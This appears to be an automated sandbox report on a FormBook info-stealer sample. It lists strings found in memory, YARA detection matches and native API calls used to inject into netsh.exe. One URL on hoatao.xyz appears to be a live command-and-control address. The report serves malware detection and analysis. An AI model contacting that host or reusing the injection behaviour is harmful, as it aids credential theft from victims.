Source: #6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/I
Source: #6495PI-29458-2020.exe, 00000000.00000003.343230134.00000000054B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/t
Source: #6495PI-29458-2020.exe, 00000000.00000003.343574431.00000000054BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/m
Source: #6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/n-u3
Source: #6495PI-29458-2020.exe, 00000000.00000003.343032173.00000000054B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ww.m
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: netsh.exe, 00000014.00000002.608434509.000000000412F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hoatao.xyz/wt5i/?q0DD6=2dfL90cX&8pjDV6=tXijk4hnD7izr0wZK7

Source: #6495PI-29458-2020.exe, 00000000.00000002.439309006.0000000000D08000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00419D50 NtCreateFile,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00419E00 NtReadFile,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00419E80 NtClose,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00419F30 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00419D4C NtCreateFile,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00419DFB NtReadFile,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00419F2A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B799A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B798F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B795D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B797A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B799D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79950 NtQueueApcThread,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B798A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79820 NtEnumerateKey,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B7B040 NtSuspendThread,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B7A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79B00 NtSetValueKey,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79A10 NtQuerySection,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B795F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B7AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79560 NtWriteFile,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B7A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B7A770 NtOpenThread,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79770 NtSetInformationFile,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79760 NtOpenProcess,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B796D0 NtCreateKey,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B79650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037796D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037795D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037799A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0377A770 NtOpenThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779760 NtOpenProcess,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0377A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0377A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037797A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779A20 NtResumeThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779A10 NtQuerySection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779560 NtWriteFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0377AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037795F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037799D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0377B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03779820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037798F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037798A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03129E00 NtReadFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03129E80 NtClose,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03129D50 NtCreateFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03129D4C NtCreateFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03129DFB NtReadFile,

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA1070
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA3168
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA2218
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA0471
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA1818
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA4068
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA3060
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA4058
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA5260
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA5251
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA5498
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA5488
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA5760
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA5751
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA5931
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_00FA0FC1
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00401030
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041D19B
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041D343
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041D49B
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00402D87
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00402D90
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00409E30
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041E70A
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00402FB0
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B54120
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3F900
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B620A0
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4B090
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C028EC
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C020A8
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1002
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C0E824
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6EBB0
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF03DA
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFDBD2
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C02B28
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C022AE
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C025DD
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62581
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4D5E0
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B30D20
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C01D55
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C02D07
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4841F
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFD466
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C0DFCE
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C01FF1
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C02EF7
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B56E30
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFD616
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03801FF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376EBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03756E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03802EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03730D20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03754120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03802D07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03801D55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_038020A8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374841F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1002
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037620A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374B090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0312D343
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0312D19B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03112FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03119E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03112D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03112D87

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: String function: 01B3B150 appears 45 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0373B150 appears 35 times

Source: #6495PI-29458-2020.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: #6495PI-29458-2020.exe, 00000000.00000002.449589021.0000000007710000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs #6495PI-29458-2020.exe
Source: #6495PI-29458-2020.exe, 00000000.00000000.334894034.0000000000607000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameiH1Ql.exe2 vs #6495PI-29458-2020.exe
Source: #6495PI-29458-2020.exe, 00000000.00000002.440896694.0000000002C7D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameResource_Meter.dll> vs #6495PI-29458-2020.exe
Source: #6495PI-29458-2020.exe, 00000000.00000002.444904187.0000000004DE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs #6495PI-29458-2020.exe
Source: #6495PI-29458-2020.exe, 0000000D.00000000.437934792.0000000000F87000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameiH1Ql.exe2 vs #6495PI-29458-2020.exe
Source: #6495PI-29458-2020.exe, 0000000D.00000002.497442068.00000000019EC000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamenetsh.exej% vs #6495PI-29458-2020.exe
Source: #6495PI-29458-2020.exe, 0000000D.00000002.498156199.0000000001C2F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs #6495PI-29458-2020.exe
Source: #6495PI-29458-2020.exe	Binary or memory string: OriginalFilenameiH1Ql.exe2 vs #6495PI-29458-2020.exe

Source: #6495PI-29458-2020.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
